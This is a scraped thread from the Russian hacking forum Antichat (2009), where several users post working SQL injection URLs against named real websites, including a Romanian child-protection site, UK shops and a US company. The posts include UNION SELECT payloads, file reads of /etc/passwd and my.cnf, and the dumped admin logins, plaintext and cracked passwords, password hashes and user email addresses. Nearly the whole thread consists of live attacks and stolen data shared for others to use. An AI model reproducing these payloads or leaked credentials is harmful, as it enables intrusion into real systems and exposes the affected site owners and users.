ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7641  
Старый 04.02.2009, 22:01
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user()),3--

Version: 5.0.51a-log
Database: :bancuri_biz_bd
User :mica@192.168.88.2



http://bancuri.biz/admin
User: Adrian
Pass: 111222

read /etc/passwd

http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,LOAD_FILE(0x2F6574632F706173737 764),3--
 
Ответить с цитированием

  #7642  
Старый 04.02.2009, 22:23
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

http://www.photo-kazan.ru

http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat(version(),0x3a,database()),user(),16,17,18+fro m+admin_groups+--+

юзер - photokazan_site@localhost
бд - photokazan_site
версия бд - 5.0.67-community-log


http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,id,login,pass),15,16,17,18+from+admin_ groups+--+

логин админа - admin
пароль - 123 =))))))

вот админка - http://www.photo-kazan.ru/admin

P.S. КАКОЙ ПРИДУРОК ЗАДЕФЕЙСИЛ САЙТ? ОБРАЩАЮСЬ К ПРИДУРКУ ЗАДЕФЕЙСИВШЕМУ САЙТ:
ВО ПЕРВЫХ ЭТО ТВОЙ САЙТ, ЧТО БЫ НАД НИМ ТАК ИЗДЕВАТЬСЯ?
ВО ВТОРЫХ ПОДПИСЫВАТЬСЯ HACKED BY X-@fqan ! ЗАХОДЯ С АККАУНТА АДМИНА ЭТО ПРОСТО СМЕШНО) ТЕМ БОЛЕЕ УЯЗВИМОСТЬ НАШЕЛ НЕ ТЫ.
В ТРЕТЬИХ НА АНТИЧАТЕ СОВСЕМ НЕ ОДОБРЯТЬСЯ ДЕФЕЙСИТЬ САЙТЫ!!!
В ЧЕТВЕРТЫХ Я НЕ ВЗЛАМЫВАЛ ЭТОТ САЙТ, А НАШЕЛ УЯЗВИМОСТЬ!

Последний раз редактировалось pinky07; 05.02.2009 в 02:43..
 
Ответить с цитированием

  #7643  
Старый 05.02.2009, 00:50
Аватар для BloodyMessage
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

PR3

Цитата:
http://www.recentnews.co.uk/news2.php?id=-1+union+select+1,2,3,concat(admin_name,0x3a,admin_ password),5,6,7,8,9,10,11+from+admin+limit+0,1--
alex:946d20c91f154795805cebdefe919ef7 alex1

Database Version: 4.1.22-standard
Database name: recentne_recent2
User name: recentne_recentn@localhost

Последний раз редактировалось BloodyMessage; 05.02.2009 в 00:54..
 
Ответить с цитированием

  #7644  
Старый 05.02.2009, 02:09
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9--

Version: 5.0.51a-log
Database: protectiacopilului6_ro_db
User:dgaspc6@192.168.88.2



Read my.cnf, also can read /etc/passwd

http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,LOAD_FILE(0x2F6574632F6D792E63 6E66),4,5,6,7,8,9--
 
Ответить с цитированием

  #7645  
Старый 05.02.2009, 02:44
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

http://takafol.ru/news.php?g=0+union+select+1,2,concat_ws(0x3a,datab ase(),user(),version()),4,5,6+--+;&page=5

бд - db_takafol
юзер - takafol@localhost
версия бд - 4.0.23-standard


http://www.eurasica.ru/articles/-kazakh'+union+select+1,2,concat_ws(0x3a,database() ,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22+--+/

бд - kyrgyz2_eurasica
юзер - kyrgyz2_eurasica@localhost
версия бд - 4.1.22-log

Последний раз редактировалось pinky07; 05.02.2009 в 02:48..
 
Ответить с цитированием

  #7646  
Старый 05.02.2009, 04:26
Аватар для BloodyMessage
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

rp3

Цитата:
http://www.fireplaceworld.co.uk/package.php?name=The%20Adam%20Sambro%20Electric%20 Suite&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*
Database Version: 5.0.45
Database name: endeva
User name: tom@localhost


Из базы можно вытянуть пароли из базы bebeamour (www.bebeamour.co.uk - pr3):
Цитата:
http://www.fireplaceworld.co.uk/package.php?name=The%20Adam%20Sambro%20Electric%20 Suite&id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ bebeamour.users/*
bebeamor:dream13dust


из базы e107: (e107.org - PR7 2002 г)
Цитата:
http://www.fireplaceworld.co.uk/package.php?name=The%20Adam%20Sambro%20Electric%20 Suite&id=-1+union+select+1,2,3,concat(user_loginname,0x3a,us er_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+e107.e107_user/*
administrator:a2259f7acbf0b601de00543ccb59ef6e
Админку можно найти введя в поиск сайта "administrator"
В куках пасс md5(md5(pass)), значит a2259f7acbf0b601de00543ccb59ef6e превращаем в 80636326bb61acaa05911fc3bc1458ca, добавим ID и... в общем это только при поверхностном просмотре, а так сами копайте.


и на последок:
Цитата:
http://www.stand4av.co.uk/catalogue.php?id=-1+union+select+1,concat(username,0x3a,pass),3,4,5, 6,7,8+from+login+limit+0,1--
Database Version: 4.1.21-log
Database name: cheapelectric
User name: cheap@localhost

http://www.stand4av.co.uk/login.php

немного расшифрованных пассов...
greg:jimi55
del:eminem
Paull:123456
blaise:summer
mjaggard:Philip
 
Ответить с цитированием

  #7647  
Старый 05.02.2009, 05:43
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.smarterguys.com/view-item.php?id=1279895789+union+select+1,concat_ws(0x 3a,version(),user(),database()),3,4,5,6,7,8--
Database Version: 5.0.45-log
Database name: smarterguys_cms
User name: smarterguys_cms@192.168.0.64


Цитата:
http://www.smarterguys.com/view-item.php?id=1279895789+UNION+SELECT+1,CONCAT(0x3a, (SELECT+CONCAT(username,0x3a,password,0x3a,email)+ FROM+smarterguys_cms.PortalUsers+LIMIT+1,1),0x3a), 3,4,5,6,7,8--
: timmd909 : clocke : tim@timmd909.dyndns.org
: maxx : gramax : mitchell@smarterguys.com


Цитата:
http://www.heerys.com/product-detail.php?productID=16768768759+union+select+1,2, 3,4,5,6,concat_ws(0x3a,version(),user(),database() ),8,9,10,11,12,13,14,15,16,17,18--&ID=11&type=
Database Version:4.1.22-log
User name:bq83845zb3@localhost
Database name:heerys_live


Цитата:
http://www.darkauction.com/product_desc.php?id=3444179865+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35--
Database Version:4.1.22-max-log
User name:scottjking@208.109.78.133
Database name:scottjking


Цитата:
http://ddcnyc.com/product.php?id=366937809809877+union+select+1,2,3, 4,5,concat_ws(0x3a,version(),user(),database()),7, 8,9,10,11,12,13,14,15,16--&cat=bed&subcat=bedroom%20furniture
Database Version: 5.0.51a-community
Database name: ddc_ddcnyccomdev
User name: ddc_ddc@localhost


Цитата:
http://www.chinmayapublication.com/dept.php?id=168768993+UNION+SELECT+AES_DECRYPT(AES _ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3 a,User(),0x3a),0x71),0x71),2,3,4,5,6,7--
Database Version: 4.1.14
Database name: CPublications
User name: siddhaji@localhost

Последний раз редактировалось spherics; 05.02.2009 в 06:20..
 
Ответить с цитированием

  #7648  
Старый 05.02.2009, 05:52
Аватар для BloodyMessage
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

PR4

Цитата:
http://www.meaningfulmedia.org/about.php?id=-1+union+select+1,2,concat(user,0x3a,password),4,5, 6,7,8,9,10,11,12,13,14+from+mysql.user+limit+0,1--
Database Version: 5.0.51a-3ubuntu5.1
Database name: cms_data
User name: cms_data@localhost

Цитата:
http://www.meaningfulmedia.org/admin
debian-sys-maint:BB5CBC11A4D20B437E36051F151BA57BAD97B3BF
admin:627EAE5E81037806F9DE339F02C9C85D10371D51
pma_wOLLhjqYnwwF:B7DF9030E224B44878D02C2BDA5288F81 5DA29AF
horde:92F55D68BBED49E0DF482D437351073D52189ACD
cms_data:52F22AAB2B081A315B8A05AAD32623B56C19962B
 
Ответить с цитированием

  #7649  
Старый 05.02.2009, 06:54
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Еще одна компания сильная...

Цитата:
http://www.dicksondata.com/misc/glossary.php?id=13997987+union+select+1,2,concat_w s(0x3a,version(),user(),database()),4--
Database Version: 5.0.51a-log
Database name: dicksondata_content
User name: dicksondata@10.1.1.42


Цитата:
http://www.dicksondata.com/misc/glossary.php?id=13997987+UNION+SELECT+1,2,AES_DECR YPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(Usernam e,0x3a,Password,0x3a,Email)+FROM+dicksondata_user. tUser+LIMIT+4,1),0x3a),0x71),0x71),4--
:admin:34f816b089d7f7a6348b51bdc3290d6e : admin@tablexi.com
:test:098f6bcd4621d373cade4e832627b4f6 : lucas2@tablexi.com хэш MD5 : 098f6bcd4621d373cade4e832627b4f6 : test
:mlineen:0c6b9675c57f02bac9ecbe87f8e0f07b : matt@tablexi.com
:dan1:b3fd72d19e3a844c7654951596467521 : dan@tablexi.com
:abel:ebdada7950078902a3d35860d9d0952d : agborlongan@hotmail.com


И так 41 тыщщщааа -)
 
Ответить с цитированием

  #7650  
Старый 05.02.2009, 13:51
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Эх тока четвертые версии =)
Код:
http://www.itapoa.sc.gov.br/preg.php?cat=-1%20union%20select%201,2,3,version(),5,6,7,8%20--
Код:
http://www.vniispk.ru/apple.php?key=-1%20union%20select%201,2,3,version(),5--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ